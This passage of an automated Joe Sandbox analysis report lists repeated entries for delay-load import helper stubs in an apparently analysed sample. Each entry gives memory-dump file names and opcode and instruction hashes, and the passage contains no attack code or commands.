                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 81d59d8d8a55a349b18179e8dce3c18bfec3f81a421dfb4a5f0e35d5f3ee5136
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 81d59d8d8a55a349b18179e8dce3c18bfec3f81a421dfb4a5f0e35d5f3ee5136
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4dbd4176072d46970db712c00e4b355ccfaa9956c4820b7c7d16e5a25fb8ac21
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 4dbd4176072d46970db712c00e4b355ccfaa9956c4820b7c7d16e5a25fb8ac21
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 5e40ba7a3f1012bccf91928ae73f1c52b2974b0fb1da56c6e3276665fa07fd9e
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 5e40ba7a3f1012bccf91928ae73f1c52b2974b0fb1da56c6e3276665fa07fd9e
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE1E3
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 1ece60658cdb3652f4070f2c4351b488bc21740ca734b0c9b5ab2603126785d3
                                                                                                                                  • Instruction ID: c83b337d14f6253a22e070ef4339636f3b3206a45cefa0080b91c1309264ad21
                                                                                                                                  • Opcode Fuzzy Hash: 1ece60658cdb3652f4070f2c4351b488bc21740ca734b0c9b5ab2603126785d3
                                                                                                                                  • Instruction Fuzzy Hash: 7DA011E22A800ABC3008220A2C03CFB022EF0C0B22330CA3EF822C0380A88038000832
                                                                                                                                  Function 008BE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 73deec9eac19efc88565ae1a561551fa0effdaa5c0ecde85cee33ade7251ef91
                                                                                                                                  • Instruction ID: 9595ba08e526fabdcb5d136df97d56c34852d1f4d4b7f03ca7fd6a4fb7eb7d32
                                                                                                                                  • Opcode Fuzzy Hash: 73deec9eac19efc88565ae1a561551fa0effdaa5c0ecde85cee33ade7251ef91
                                                                                                                                  • Instruction Fuzzy Hash: 9EA011E22A800A3C300822002C02CFB038EE0C0B28330822EF820E03C0AC80280028B3
                                                                                                                                  Function 008BE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 8cff0608e0751a998e366b47efac8190a339b86b3a67528dd4a5d20a2e5e6433
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 8cff0608e0751a998e366b47efac8190a339b86b3a67528dd4a5d20a2e5e6433
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  Function 008BE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 830700462031f12da02dbd2ed85a38b347591afd713394caad950d5660b212bf
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 830700462031f12da02dbd2ed85a38b347591afd713394caad950d5660b212bf
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  Function 008BE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 49bb209d7d7e4623f3088c79e9513424952001710aeeabd3d7fdfc7fb9c7e6d7
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: 49bb209d7d7e4623f3088c79e9513424952001710aeeabd3d7fdfc7fb9c7e6d7
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  Function 008BE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: af240b997714103bc164f1d8c7e322f95c39201d755a41a29db259c8d7d78beb
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: af240b997714103bc164f1d8c7e322f95c39201d755a41a29db259c8d7d78beb
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  Function 008BE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE3FC
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: e9d64a1b7fb0e9172ce113f32dec8a687224d4e6e013892b50b50e869373e5b8
                                                                                                                                  • Instruction ID: d42070d2ddaed1bc1b6377a4f911a91fb593fb11925a80104d490481b001b3e9
                                                                                                                                  • Opcode Fuzzy Hash: e9d64a1b7fb0e9172ce113f32dec8a687224d4e6e013892b50b50e869373e5b8
                                                                                                                                  • Instruction Fuzzy Hash: 20A011E22A800ABC300822002C02CFB038EE0C8B203308A2EF822C03C0A880280028B3
                                                                                                                                  Function 008BE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 703b8dc63eb5760e767688d54af0912a43daa839e4a792cf2e459bbdbc1d0350
                                                                                                                                  • Instruction ID: 69428d56595ee3204769fd987a136bc0d2d8fbbb1774c798537e3ff675bace60
                                                                                                                                  • Opcode Fuzzy Hash: 703b8dc63eb5760e767688d54af0912a43daa839e4a792cf2e459bbdbc1d0350
                                                                                                                                  • Instruction Fuzzy Hash: 4BA011C22A800ABC300822A22C02CFB020EE8C0B283308A2FF822C03C0B88028000832
                                                                                                                                  Function 008BE5A2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: cf38654835f1b3a400a78963b2a93481313e491a612b425552797c1993d77c5a
                                                                                                                                  • Instruction ID: 69428d56595ee3204769fd987a136bc0d2d8fbbb1774c798537e3ff675bace60
                                                                                                                                  • Opcode Fuzzy Hash: cf38654835f1b3a400a78963b2a93481313e491a612b425552797c1993d77c5a
                                                                                                                                  • Instruction Fuzzy Hash: 4BA011C22A800ABC300822A22C02CFB020EE8C0B283308A2FF822C03C0B88028000832
                                                                                                                                  Function 008BE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 3bbc4f9b200824a7eab28e790e96422cd83c38a8cd6a5ef877b861f976b99e0d
                                                                                                                                  • Instruction ID: c10dc4312f1496d58532712f8b7ea0567378bcb5b177b8a74f69ac3dbeaa9431
                                                                                                                                  • Opcode Fuzzy Hash: 3bbc4f9b200824a7eab28e790e96422cd83c38a8cd6a5ef877b861f976b99e0d
                                                                                                                                  • Instruction Fuzzy Hash: BBA011C22A880ABC300822082C02CFB020EE0C2F283308A2EF822C0380A8802C000832
                                                                                                                                  Function 008BE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
